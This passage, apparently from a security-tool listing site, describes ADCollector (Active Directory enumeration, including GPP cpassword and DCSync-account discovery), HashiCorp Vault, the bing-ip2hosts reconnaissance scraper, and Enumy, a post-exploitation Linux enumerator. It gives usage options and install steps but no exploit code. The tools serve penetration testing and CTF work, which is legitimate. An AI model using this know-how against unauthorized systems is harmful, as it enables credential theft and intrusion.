Interesting descriptions on user objects
Sensitive & Not delegate account
Group Policy Preference cpassword in SYSVOL/Cache
Effective GPOs on the current user/computer
Restricted groups
Nested Group Membership

Usage

C:\Users> ADCollector.exe  -h

      _    ____   ____      _ _             _
     / \  |  _ \ / ___|___ | | | ___  ___ _| |_ ___  _ __
    / _ \ | | | | |   / _ \| | |/ _ \/ __|_  __/ _ \| '__|
   / ___ \| |_| | |__| (_) | | |  __/ (__  | || (_) | |
  /_/   \_\____/ \____\___/|_|_|\___|\___| |__/\___/|_|

  v1.1.4  by dev2null

Usage: ADCollector.exe -h

    --Domain (Default: current domain)
            Enumerate the specified domain

    --Ldaps (Default: LDAP)
            Use LDAP over SSL/TLS

    --Spns (Default: no SPN scanning)
            Enumerate SPNs

    --Term (Default: 'pass')
            Term to search in user description field

    --Acls (Default: 'Domain object')
            Interesting ACLs on an object

Example: .\ADCollector.exe --SPNs --Term key --ACLs 'CN=Domain Admins,CN=Users,DC=lab,DC=local'

Changelog

v 1.1.1:

1. It now uses S.DS.P namespace to perform search operations, making searches faster and easier to implement. (It also supports paged search. )
2. It now supports searching in other domains. (command line parser is not implemented yet).
3. The code logic is reconstructed, less code, more understandable and cohesive.

v 1.1.2:

1. Separated into three classes.
2. Dispose ldap connection properly.
3. Enumerations: AdminSDHolder, Domain attributes(MAQ, minPwdLengthm maxPwdAge, lockOutThreshold, GP linked to the domain object), accounts don't need pre-authentication.
4. LDAP basic info (supportedLDAPVersion, supportedSASLMechanisms, domain/forest/DC Functionality)
5. SPN scanning (SPNs for MSSQL,Exchange,RDP and PS Remoting)
6. Constrained Delegation enumerations (S4U2Self, S4U2Proxy as well as Resources-based constrained delegation)
7. RODC (group that administers the RODC)

v 1.1.3:

1. Fixed SPN scanning result, privilege accounts group membership
2. Password does not expire accounts; User accounts with SPN set; 
3. Kerberos Policy
4. Interesting ACLs enumeration for the domain object, resolving GUIDs
5. DC info is back

v 1.1.4:

1. Some bugs are killed and some details are improved
2. SPN scanning is now optional
3. GPP cpassword in SYSVOL/Cache
4. Interesting ACLs on GPOs; Interesting descriptions on user objects;
5. Unusual DCSync accounts; Sensitive & not delegate accounts
6. Effective GPOs on user/computer
7. Restricted groups
8. Nested Group Membership

Project
For more information (current progress/Todo list/etc) about this tool, you can visit my project page

Download ADCollector

Please note: We take Vault's security and our users' trust very seriously. If you believe you have found a security issue in Vault, please responsibly disclose by contacting us at security@hashicorp.com.

Website: https://www.vaultproject.io
IRC: #vault-tool on Freenode
Announcement list: Google Groups
Discussion list: Google Groups
Documentation: https://www.vaultproject.io/docs/
Tutorials: HashiCorp's Learn Platform
Certification Exam: Vault Associate

Vault is a tool for securely accessing secrets. A secret is anything that you want to tightly control access to, such as API keys, passwords, certificates, and more. Vault provides a unified interface to any secret, while providing tight access control and recording a detailed audit log.
A modern system requires access to a multitude of secrets: database credentials, API keys for external services, credentials for service-oriented architecture communication, etc. Understanding who is accessing what secrets is already very difficult and platform-specific. Adding on key rolling, secure storage, and detailed audit logs is almost impossible without a custom solution. This is where Vault steps in.
The key features of Vault are:

Secure Secret Storage: Arbitrary key/value secrets can be stored in Vault. Vault encrypts these secrets prior to writing them to persistent storage, so gaining access to the raw storage isn't enough to access your secrets. Vault can write to disk, Consul, and more.
Dynamic Secrets: Vault can generate secrets on-demand for some systems, such as AWS or SQL databases. For example, when an application needs to access an S3 bucket, it asks Vault for credentials, and Vault will generate an AWS keypair with valid permissions on demand. After creating these dynamic secrets, Vault will also automatically revoke them after the lease is up.
Data Encryption: Vault can encrypt and decrypt data without storing it. This allows security teams to define encryption parameters and developers to store encrypted data in a location such as SQL without having to design their own encryption methods.
Leasing and Renewal: All secrets in Vault have a lease associated with it. At the end of the lease, Vault will automatically revoke that secret. Clients are able to renew leases via built-in renew APIs.
Revocation: Vault has built-in support for secret revocation. Vault can revoke not only single secrets, but a tree of secrets, for example all secrets read by a specific user, or all secrets of a particular type. Revocation assists in key rolling as well as locking down systems in the case of an intrusion.

Documentation, Getting Started, and Certification Exams
Documentation is available on the Vault website.
If you're new to Vault and want to get started with security automation, please check out our Getting Started guides on HashiCorp's learning platform. There are also additional guides to continue your learning.
Show off your Vault knowledge by passing a certification exam. Visit the certification page for information about exams and find study materials on HashiCorp's learning platform.

Developing Vault
If you wish to work on Vault itself or any of its built-in systems, you'll first need Go installed on your machine. Go version 1.13.7+ is required.
For local dev first make sure Go is properly installed, including setting up a GOPATH. Ensure that $GOPATH/bin is in your path as some distributions bundle old version of build tools. Next, clone this repository. Vault uses Go Modules, so it is recommended that you clone the repository outside of the GOPATH. You can then download any required build tools by bootstrapping your environment:

$ make bootstrap
...

To compile a development version of Vault, run make or make dev. This will put the Vault binary in the bin and $GOPATH/bin folders:

$ make dev
...
$ bin/vault
...

To compile a development version of Vault with the UI, run make static-dist dev-ui. This will put the Vault binary in the bin and $GOPATH/bin folders:

$ make static-dist dev-ui
...
$ bin/vault
...

To run tests, type make test. Note: this requires Docker to be installed. If this exits with exit status 0, then everything is working!

$ make test
...

If you're developing a specific package, you can run tests for just that package by specifying the TEST variable. For example below, only vault package tests will be run.

$ make test TEST=./vault
...

Acceptance Tests
Vault has comprehensive acceptance tests covering most of the features of the secret and auth methods.
If you're working on a feature of a secret or auth method and want to verify it is functioning (and also hasn't broken anything else), we recommend running the acceptance tests.
Warning: The acceptance tests create/destroy/modify real resources, which may incur real costs in some cases. In the presence of a bug, it is technically possible that broken backends could leave dangling data behind. Therefore, please run the acceptance tests at your own risk. At the very least, we recommend running them in their own private account for whatever backend you're testing.
To run the acceptance tests, invoke make testacc:

$ make testacc TEST=./builtin/logical/consul
...

The TEST variable is required, and you should specify the folder where the backend is. The TESTARGS variable is recommended to filter down to a specific resource to test, since testing all of them at once can sometimes take a very long time.
Acceptance tests typically require other environment variables to be set for things such as access keys. The test itself should error early and tell you what to set, so it is not documented here.
For more information on Vault Enterprise features, visit the Vault Enterprise site.

Download Vault

Bing-ip2hosts is a Bing.com web scraper to discover hostnames by IP address.

Description
Bing-ip2hosts is a Bing.com web scraper that discovers hostnames by IP address. Bing is the flagship Microsoft search engine formerly known as MSN Search and Live Search.

It provides a feature unique to search engines - it allows searching by IP address. Bing-ip2hosts uses this feature.

It can be used to discover subdomains and other related domains. It also helps to identify websites hosted in a shared hosting environment. This technique follows best practices during the reconnaissance phase of a penetration test or bug bounty, to expand the target's attack surface.
Unlike other many other recon tools that web scrape Bing, this tool has smart scraping behaviour to maximize the discovery of hostnames.

Features

Smart scraping behaviour to maximize hostname discovery.
Console user interface showing scraping progress.
Discovers subdomains and hostnames by IP address.
Can search by hostname or IP address.
Output with or without URL prefix.
Output to file, in list or CSV format.
Bing API key not required.
Select the search language and market.
Specify targets from the commandline or from a file.
Lightweight Bash shell script without heavy dependencies.

Bing Web Scraping

Bing provides a feature unique to search engines - it allows searching by IP address. To try this, go to Bing.com and search for IP:40.113.200.201. It should show you results from microsoft.com. If it shows empty results, then add a single dot.

Smart Scraping Behaviour
Unlike other Bing web scrapers that stop after scraping 10 result pages, bing-ip2hosts can scrape thousands of results. It continues scraping search result pages until it no longer finds new results.
Scraping completes when any of the following conditions are met:

After a configurable threshold of pages fail to return new results (default: 5).
A single page of search results, e.g. 10 or less results.
The last page of search results.
Empty results.

It also alerts the user when Bing reports that some results have been removed.

Avoid Empty Search Results
If searching by an IP address returns empty search results, add a single dot. Bing-ip2hosts always appends a single dot (%2e) to the query to avoid this issue.

Search Language and Market
By default this tool specifies the search langauge as "en-us". The market is left as unset, as this seems to maximize results.
The following URL parameters can be configured:

setlang (Language)
setmkt (Market code)

Both these parameters can affect how many results are returned.
A full list of market codes can be found at docs.microsoft.com/en-us/azure/cognitive-services/bing-web-search/language-support.

Repeating Search Result Pages
Sometimes Bing does not permit the user to reach the end of search result pages.
For example, in a search that shows 3 pages of results, it will not always allow the user to reach the 3rd page. Instead it will return the first page of results. This can be demonstrated by searching for ip:8.8.8.8 .. Note that it is not always the first page that it returned to.

Help

Use the following command for usage information.

bing-ip2hosts is a Bing.com web scraper that discovers websites by IP address.
Use for OSINT and discovering attack-surface of penetration test targets.

Usage: ./bing-ip2hosts [OPTIONS] IP|hostname

OPTIONS are:
-o FILE Output hostnames to FILE.
-i FILE Input list of IP addresses or hostnames from FILE.
-n NUM Stop after NUM scraped pages return no new results (Default: 5).
-l Select the language for use in the setlang parameter (Default: en-us).
-m Select the market for use in the setmkt parameter (Default is unset).
-u Only display hostnames. Default is to include URL prefixes.
-c CSV output. Outputs the IP and hostname on each line, separated by a comma.
-q Quiet. Disable output except for final results.
-t DIR Use this directory instead of /tmp.
-V Display the version number of bing-ip2hosts and exit.

Installation

Dependencies
bing-ip2hosts requires wget. This is installed by default in Ubuntu Linux and Kali Linux.
It can be installed in macOS with homebrew.

homebrew install wget

It can be installed in Debian and Ubuntu Linux with apt.

sudo apt install wget

Install
Copy bing-ip2hosts into a folder in your $PATH.

sudo cp ./bing-ip2hosts /usr/local/bin/

Compatibility
Bing-ip2hosts uses the Bash scripting language.
It is known to work with the following systems.

Ubuntu Linux

GNU bash, version 4.4.20(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

macOS Catalina

The version of Bash bundled with macOS was published in 2007 and is the most recent version licenced with GPLv2. More recent versions are licenced with GPLv3, with licence terms that preclude Apple from bundling it in macOS.

GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin19)
Copyright (C) 2007 Free Software Foundation, Inc.

Links

Homepage: http://www.morningstarsecurity.com/research/bing-ip2hosts/
Source: https://github.com/urbanadventurer/bing-ip2hosts
Kali Linux Tools: https://tools.kali.org/information-gathering/bing-ip2hosts
Kali Linux Package: https://gitlab.com/kalilinux/packages/bing-ip2hosts/tree/kali/master
Homebrew Kali: https://github.com/b-ramsey/homebrew-kali
ArchLinux Package: https://aur.archlinux.org/packages/bing-ip2hosts/
ArchStrike : https://archstrike.org/packages/bing-ip2hosts
BlackArch : https://blackarch.org/recon.html

Related Projects
Here's a list of projects that also search Bing by IP address.

HostHunter by SpiderLabs

Here's a list of other related projects for recon using Bing. Note that these do not search Bing by IP address.

Sublist3r by aboul3la
recon-ng by lanmaster53

Author
Copyright Andrew Horton, aka urbanadventurer.

Contributing
If you have any ideas, just open an issue and tell me what you think.
If you'd like to contribute, please fork the repository and make changes as you'd like. Pull requests are warmly welcome.

Acknowledgments
This project uses the following opensource packages.

Download Bing-Ip2Hosts

Enumy is portable executable that you drop on target Linux machine during a pentest or CTF in the post exploitation phase. Running enumy will enumerate the box for common security vulnerabilities. Enumy has a Htop like Ncurses interface or a standard interface for dumb reverse shells.

Installation
You can download the final binary from the release x86 or x64 tab. Statically linked to musl Transfer the final enumy binary to the target machine

latest release

./enumy

Who Should Use Enumy?

Pentester can run on a target machine raisable issues for their reports.
CTF players can use it identify things that they might have missed.
People who are curious to know how many isues enumy finds on their local machine?

Options

$ ./enumy64 -h

▄█▀─▄▄▄▄▄▄▄─▀█▄  _____
▀█████████████▀ |   __|___ _ _ _____ _ _
█▄███▄█     |   __|   | | |     | | |
█████      |_____|_|_|___|_|_|_|_  |
█▀█▀█                          |___|

------------------------------------------

Enumy - Used to enumerate the target environment and look for common
security vulnerabilities and hostspots

 -o <loc>     Save results to location
 -i <loc>     Ignore files in this directory (usefull for network shares)
 -w <loc>     Only walk files in thi   s directory (usefull for devlopment)
 -t <num>     Threads (default 4)
 -f           Run full scans
 -d           Display debugging information
 -n           Enabled ncurses
 -h           Show help

Compilation
To compile during devlopment, make libcap and the ncurses libary is all that is required.

make

To remove the glibc dependency and statically link all libaries/compile with musl do the following. Note to do this you will have to have docker installed to create the apline build environment.

./build.sh 64bit  ./build.sh 32bit  ./build.sh all  cd output

Scans That've Been Implemented
Below is the ever growing list of scans that have been implemented.

Quck Scan

SUID/GUID scans
File capabilities
Interesting files scan
Coredump scan
Breakout binary scan

Full Scan

Quick Scan
Binary analysis

Scan Times
Changing the default number of threads is pretty pointless unless you're running a full scan. A full scan will do a lot more IO so more threads greatly decrease scan times. These are the scan times with a i7-8700k and 2 million files scanned.

Quick Scan Times

2 Thread -> system 70% cpu 54.093 total
2 Thread -> system 121% cpu 26.122 total
4 Thread -> system 289% cpu 15.657 total
8 Threads -> system 468% cpu 15.863 total
12 Thread -> system 420% cpu 20.548 total

Full Scan Times

1 Thread -> system 50% cpu 3:16.38 total
2 Thread -> system 86% cpu 1:33.95 total
4 Thread -> system 165% cpu 47.753 total
8 Threads -> system 366% cpu 29.768 total
12 Thread -> system 467% cpu 29.815 total

How To Contribute

If you can think of a scan idea that has not been implemented, raise it as an issue.
Make a pull request, make sure that.
- Each scan is given a unique ID
- Multiple related scans are in the same file.
- No more than one scan/test per function.

Download Enumy